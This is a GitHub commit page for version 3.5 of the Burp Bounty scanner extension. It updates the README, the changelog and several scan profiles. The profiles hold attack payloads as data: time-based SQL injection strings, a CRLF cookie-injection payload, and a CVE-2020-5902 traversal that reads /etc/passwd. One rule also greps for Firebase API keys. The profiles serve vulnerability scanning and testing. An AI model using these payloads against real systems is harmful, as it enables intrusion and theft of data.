Skip to content

Commit ae33e97

Browse files
author
root
committed
Version 3.5
1 parent 92aac5f commit ae33e97

File tree

130 files changed

+17262
-93
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

130 files changed

+17262
-93
lines changed

BappDescription.html

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
<p>This BurpSuite extension allows you, in a quick and simple way, to improve
2+
the active and passive BurpSuite scanner by means of personalized rules
3+
through a very intuitive graphical interface. Through an advanced search of
4+
patterns and an improvement of the payload to send, we can create our own
5+
issue profiles both in the active scanner and in the passive.</p>
6+
7+
<p>* Usage manual: <a href="https://github.com/wagiro/BurpBounty/wiki/usage">Wiki</a>.</p>
8+
9+
<p>* You can download profile from: <a href="https://github.com/wagiro/BurpBounty/tree/master/profiles">Github</a>.</p>
10+
11+
<p>* Author's on Twitter: <a href="https://twitter.com/BurpBounty">@BurpBounty</a> <a href="https://twitter.com/egarme">@egarme</a></p>
12+
13+
<p>* More information at: <a href="https://burpbounty.net">https://burpbounty.net</a></p>
14+
15+
16+
<p>* If you need more power, I invite you to try the new <b>Burp Bounty Pro</b>, which gives you more power and automation during your manual pentests.</p>

CHANGELOG.md

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,13 @@
11
## Changelog
2+
**3.5.0 20201001**
3+
* Fixed bug with Payload and Payload without encode match type
4+
* Changed the default directory from user.dir to user.home
5+
* Added <payload> and <grep> variables for printing issue details in Advisory.
6+
* Fixed regex grep case sensitive
7+
* Better redirection performance
8+
* Fixed bug with Match And Replace
9+
10+
211
**3.4.0 20200621**
312
* Fixed bug with delete button on windows systems
413
* Fixed bug with Java array

README.md

Lines changed: 16 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -8,26 +8,36 @@
88

99
# Burp Bounty - Scan Check Builder (BApp Store)
1010

11+
This Burp Suite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.<br/>
12+
1113
Download releases:
1214

1315
* https://github.com/wagiro/BurpBounty/releases/
1416

1517

16-
This Burp Suite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.
1718

19+
<br/>If you need more power, I invite you to try the new <b>Burp Bounty Pro</b>, which gives you more power and automation during your manual pentests.
20+
21+
<br/>More information at: [https://burpbounty.net](https://burpbounty.net) and [Burp Bounty Pro vs Free](https://burpbounty.net/burp-bounty-pro-vs-free/).
1822

1923

2024
## Usage
2125

22-
* Go to [Usage](https://github.com/wagiro/BurpBounty/wiki/usage) section.
26+
* Go to [Usage](https://github.com/wagiro/BurpBounty/wiki/usage) section or the slides of [Ekoparty Security Conference](https://burpbounty.net/burp-bounty-ekoparty-2020/).
2327

2428
## Profiles
2529

26-
* Profiles from [egarme](https://twitter.com/egarme) in [Github](https://github.com/wagiro/BurpBounty/tree/master/profiles/)
27-
28-
* Profiles from [Gocha](https://twitter.com/GochaOqradze) in their [Github](https://github.com/ghsec/BBProfiles)
30+
* Thanks to [Six2dez1](https://twitter.com/Six2dez1) for collect all of the Burp Bounty profiles and also share their own. You can find the collection [HERE](https://github.com/wagiro/BurpBounty/tree/master/profiles/)
31+
32+
* Also thanks to:
33+
34+
- [Gocha](https://twitter.com/GochaOqradze)
35+
- [Sy3Omda](https://twitter.com/Sy3Omda)
36+
- [Syed](https://twitter.com/syed__umar)
37+
- [n00py1](https://twitter.com/n00py1)
38+
- [legik](https://github.com/legik)
2939

30-
* Profiles from [Sy3Omda](https://twitter.com/Sy3Omda) in their [Github](https://github.com/Sy3Omda/burp-bounty)
40+
All of them have contributed by sharing their Burp Bounty profiles
3141

3242

3343
### For example videos please visit our youtube channel:
@@ -43,9 +53,3 @@ This Burp Suite extension allows you, in a quick and simple way, to improve the
4353

4454

4555
<br/>
46-
47-
48-
## Donations
49-
If you like this extension, you can collaborate to continue developing it and improve it faster:
50-
51-
- Paypal - https://paypal.me/Burpbounty

profiles/AllowCredentials.bb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
[{"Name":"Access-Control-Allow-Credentials","Enabled":true,"Scanner":2,"Author":"n00py","UrlEncode":false,"Grep":["true,Or,Access-Control-Allow-Credentials: true"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Access-Control-Allow-Credentials: True","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"The application sets the Access-Control-Allow-Credentials: True HTTP header. An attempt should be made to manipulate the origin to see if origins are being reflected into the response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
1+
[{"Name":"AllowCredentials","Enabled":true,"Scanner":2,"Author":"@n00py1","UrlEncode":false,"Grep":["true,Or,Access-Control-Allow-Credentials: true"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Access-Control-Allow-Credentials: True","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"The application sets the Access-Control-Allow-Credentials: True HTTP header. An attempt should be made to manipulate the origin to see if origins are being reflected into the response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]

profiles/BlindSQLi-TimeBased.bb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
[{"Name":"BlindSQLi-TimeBased","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027 and sleep 12--","\u0027 and sleep 12","\u0027 and sleep 12 and \u00271\u0027\u003d\u00271","\u0027 and sleep(12) and \u00271\u0027\u003d\u00271","\u0027 and sleep(12)--","\u0027 and sleep(12)",";sleep(12)--","\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));","\u0027 SELECT SLEEP(12); #","\u0027 WAITFOR DELAY \u00270:0:12\u0027--","\u0027 WAITFOR DELAY \u00270:0:12\u0027","\u0027 SELECT pg_sleep(12);"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"8","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":5,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-TimeBased","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
1+
[{"Name":"BlindSQLi-TimeBased","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027 and sleep 25--","\u0027 and sleep 25","\u0027 and sleep 25 and \u00271\u0027\u003d\u00271","\u0027 and sleep(25) and \u00271\u0027\u003d\u00271","\u0027 and sleep(25)--","\u0027 and sleep(25)",";sleep(25)--","\u0027 SELECT BENCHMARK(2500000,MD5(\u0027A\u0027));","\u0027 SELECT SLEEP(25); #","\u0027 WAITFOR DELAY \u00270:0:25\u0027--","\u0027 WAITFOR DELAY \u00270:0:25\u0027","\u0027 SELECT pg_sleep(25);"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"20","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":5,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-TimeBased","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]

profiles/CRLF-Attack.bb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
[{"Name":"CRLF-Attack","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["%0D%0ASet-Cookie:%20mycookie\u003dmyvalue"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[" ^Set-Cookie:\\smycookie\u003dmyvalue"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":3,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CRLF-Attack","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
1+
[{"Name":"CRLF-Attack","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["%0D%0ASet-Cookie:%20mycookie\u003dmyvalue"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or, ^Set-Cookie:\\smycookie\u003dmyvalue"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CRLF-Attack","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]

profiles/F5-BigIP_CVE-2020-5902.bb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
[{"Name":"F5-BigIP_CVE-2020-5902","Enabled":true,"Scanner":1,"Author":"@burpbounty","Payloads":["/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName\u003d/etc/passwd"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x:0"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":true,"ResponseCode":"200","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"F5-BigIP_CVE-2020-5902","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"More info at: https://support.f5.com/csp/article/K52145254","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}]
1+
[{"Name":"F5-BigIP_CVE-2020-5902","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName\u003d/etc/passwd"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x:0"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":true,"ResponseCode":"200","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"F5-BigIP_CVE-2020-5902","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"More info at: https://support.f5.com/csp/article/K52145254","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}]

profiles/FireBase_API.bb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
[{"Name":"FireBase_API","Enabled":true,"Scanner":2,"Author":"@syed__umar","UrlEncode":false,"Grep":["true,Or,apiKey:\\s\"(.*?)\","],"Tags":["All","InformationDisclosure"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":true,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Firebase API Token leakage","IssueSeverity":"Medium","IssueConfidence":"Firm","IssueDetail":"The API key of Firebase was found present in the source code of the web application. As it is, it doesn\u0027t pose any threat to the application. \n\nBut, do try this POC: https://gist.github.com/Anon-Exploiter/5232869d84d01d0e90377410ef25f576\n\nHost the above .html file on a server/vps (don\u0027t try on localhost, sometimes DEVs allow localhost for their own servers) - If it works, that means there\u0027s no restriction and anyone can utilize the keys to query the database from any application.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"Restrict the firebase keys to the Web Application\u0027s URL/Host only\n\nReference: https://stackoverflow.com/questions/35418143/how-to-restrict-firebase-data-modifications","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]

profiles/tags.txt

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1 +1,2 @@
11
All
2+
InformationDisclosure

src/ActiveProfile.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -121,7 +121,7 @@ public boolean isCellEditable(int row, int column) {
121121
if (callbacks.loadExtensionSetting("filename") != null) {
122122
filename = callbacks.loadExtensionSetting("filename")+ File.separator;;
123123
} else {
124-
filename = System.getProperty("user.dir")+ File.separator;;
124+
filename = System.getProperty("user.home")+ File.separator;;
125125
}
126126
showHeaders(headers);
127127
showGrepsTable();

0 commit comments

Comments
 (0)